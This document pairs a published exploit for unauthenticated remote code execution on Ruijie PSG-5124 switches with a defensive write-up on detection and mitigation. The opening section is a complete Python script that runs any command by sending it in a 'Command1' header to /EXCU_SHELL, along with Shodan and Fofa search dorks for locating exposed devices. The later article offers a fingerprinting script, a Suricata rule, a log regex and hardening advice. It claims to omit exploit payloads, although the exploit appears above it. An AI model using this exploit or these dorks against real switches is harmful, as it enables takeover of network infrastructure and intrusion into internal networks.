Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)
#- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)
#- Shodan Dork: http.html_hash:-1402735717
#- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif"
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Version: PSG-5124(LINK SOFTWARE RELEASE:26293)
#- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293)
import http.client
import argparse
def send_request(ip, port, command):
headers = {
"Host": f"{ip}:{port}",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br",
"DNT": "1",
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"Cmdnum": "1",
"Confirm1": "n",
"Content-Length": "0",
"Command1": command
}
try:
connection = http.client.HTTPConnection(f"{ip}:{port}")
connection.request("GET", "/EXCU_SHELL", headers=headers)
response = connection.getresponse()
print(f"Status Code: {response.status}")
print(response.read().decode('utf-8'))
connection.close()
except Exception as e:
print(f"Request failed: {e}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='proof of concept for ruijie Switches RCE')
parser.add_argument('--ip', help='Target IP address', required=True)
parser.add_argument('--port', help='Port', required=True)
parser.add_argument('--cmd', help='Command', required=True)
args = parser.parse_args()
ip = args.ip
port = args.port
command = args.cmd
send_request(ip, port, command)Ruijie Switch PSG-5124 (LINK SOFTWARE RELEASE:26293) — Remote Code Execution (RCE) Analysis and Mitigation
This article analyzes a reported remote code execution (RCE) issue affecting Ruijie PSG-5124 switches (LINK SOFTWARE RELEASE:26293). It explains the nature and impact of the vulnerability, non-actionable detection techniques, defensive controls, recommended mitigations, and responsible disclosure/testing practices for network defenders and administrators.
Overview
The Ruijie PSG-5124 series is a managed switch used in enterprise and campus networks. A security researcher reported that a specific firmware release (26293) exposes an HTTP endpoint allowing related request manipulation that can lead to remote command execution on affected devices.
- Affected product: Ruijie PSG-5124
- Affected version: LINK SOFTWARE RELEASE:26293 (reported)
- Risk: High — remote unauthenticated command execution can lead to full device compromise and network pivoting
Technical summary (non-actionable)
Reportedly, the device exposes a management HTTP interface that accepts crafted requests which can cause the device to execute arbitrary commands. The attack surface includes an unauthenticated web endpoint used by the switch’s administration UI. Because this can lead to execution at the system level, the impact includes device takeover, persistence, firmware modification, and movement into the protected network segments.
This section intentionally omits exploit payloads and step-by-step attack instructions. The focus below is on detection, risk management and mitigation for defenders.
Indicators of Compromise and Discovery
When hunting for affected devices or potential exploitation, the following indicators are useful:
- Web UI artifacts: known login page resources or image references found in the device’s HTTP response (publicly referenced by researchers and search engine queries).
- Access attempts to suspicious or uncommon endpoints used by the device management interface.
- Unusual system behavior on the switch: high CPU, unexpected reboots, changes to configuration files, or unexpected outbound connections originating from the device.
Safe detection: network reconnaissance (non-exploit)
To discover potentially affected devices without attempting exploitation, you can query the device web UI and search for known static strings used in the login page. The example below demonstrates a safe fingerprinting approach that only performs a benign GET to the root page and looks for known image references.
#!/usr/bin/env python3
# Safe fingerprinting: checks for web UI markers in a non-destructive way.
import requests
import sys
def check_device(url, timeout=5):
try:
r = requests.get(url, timeout=timeout, verify=False)
body = r.text
markers = ["img/free_login_ge.gif", "./img/login_bg.gif"]
found = [m for m in markers if m in body]
if found:
print(f"Potential Ruijie PSG-5124 UI at {url}; matched markers: {found}")
else:
print(f"No markers detected at {url}")
except Exception as e:
print(f"Error checking {url}: {e}")
if __name__ == '__main__':
if len(sys.argv) != 2:
print("Usage: python3 fingerprint.py http://:/")
else:
check_device(sys.argv[1])Explanation: This script performs a harmless HTTP GET against the supplied URL and searches the response body for static image paths that are commonly present in the device’s login page. It does not attempt any additional requests, header injection, or command operations. Use it only against assets you own or are authorized to test.
Network IDS/IPS detection example
Monitoring traffic for access to suspicious management endpoints is a practical defensive measure. Below is an example Suricata/IDS rule that flags HTTP requests for a specific device management path. This rule is for detection only.
alert http any any -> any any (msg:"Possible Ruijie PSG-5124 management endpoint access"; \
flow:established,to_server; http.uri; content:"/EXCU_SHELL"; nocase; sid:1001001; rev:1;)Explanation: The rule triggers on HTTP requests where the URI contains "/EXCU_SHELL". Tune the rule (source/destination nets, port restrictions) before deployment to avoid false positives and to limit it to your management-plane monitoring points.
Log-based detection (web server access logs)
Search webserver or proxy logs for requests to management paths or anomalous header fields. Example regex for typical web logs:
GET\s+/EXCU_SHELL\s+HTTP/\d\.\dExplanation: Scanning logs for GET requests to /EXCU_SHELL helps identify attempts to reach that endpoint. Correlate with source IPs, times, and repeated attempts to prioritize investigation.
Impact and risk assessment
If exploitation is successful, an attacker may obtain full control of the switch’s control plane including:
- Modification of VLANs, ACLs, and routing — enabling lateral movement or traffic interception.
- Persistence on network infrastructure — tampering with logging, management accounts, or firmware.
- Data exfiltration, service disruption, or use as a pivot point to attack other internal hosts.
Therefore, affected devices in critical network paths (core, distribution, DMZ) present a high business risk and should be prioritized for remediation.
Mitigation and remediation
Immediate mitigations reduce risk while you coordinate longer-term remediation (firmware fixes, configuration changes):
- Isolate management interfaces: Restrict access to the switch management plane to dedicated management VLANs or out-of-band management networks.
- Apply network ACLs: Limit which hosts can reach the switch’s web and management ports (HTTP/HTTPS, SSH, SNMP) via firewall rules.
- Disable unsecured protocols: If possible, disable HTTP (use HTTPS only) and other unnecessary services on management interfaces.
- Change default credentials and enforce strong authentication: Use unique admin passwords and consider role-based access and MFA where supported.
- Update firmware: Contact Ruijie or your vendor/reseller for the latest firmware and security patches. Prioritize applying vendor-released fixes that address the issue.
- Monitoring and alerting: Deploy IDS/IPS signatures and log-monitoring for access to suspicious endpoints, unusual commands, and changes to configuration.
- Backup and recovery: Maintain verified configuration backups and a tested recovery plan in case of compromise.
Testing guidance and responsible disclosure
Testing for this vulnerability must be performed only with explicit authorization. Best practices for safe testing:
- Use a dedicated lab or isolated network with identical hardware and firmware.
- Obtain written permission before testing production systems.
- Follow coordinated disclosure: notify the vendor (Ruijie) and provide reproduction steps, logs, and affected device information. Maintain an audit trail.
- If you discover evidence of compromise in production, isolate the device from the network, capture volatile artifacts (console logs, running-process lists if possible), and engage incident response.
Expert tips for operators
- Prioritize firmware inventory: know what models and firmware levels are in your environment and monitor vendor advisories.
- Segment management traffic using dedicated switches or out-of-band management networks to prevent accidental exposure.
- Harden logging and monitoring: centralize logs (SIEM), alert on configuration changes, and implement baseline integrity checks for critical infrastructure.
- Review automated external scans (Shodan/FOFA results) and reduce public exposure of management interfaces.
Summary
The reported RCE affecting Ruijie PSG-5124 firmware release 26293 represents a high-impact risk if exploited. Network defenders should prioritize inventory, restrict management access, enable monitoring for suspicious endpoints, and work with Ruijie to obtain and deploy firmware updates. Only perform testing in authorized environments, and avoid attempting exploit activity against production devices or systems you do not own.
| Aspect | Recommendation |
|---|---|
| Immediate | Restrict management access, monitor for /EXCU_SHELL, apply ACLs |
| Short term | Patch or apply vendor mitigation, enable HTTPS, change creds |
| Long term | Network segmentation, centralized logging, incident response readiness |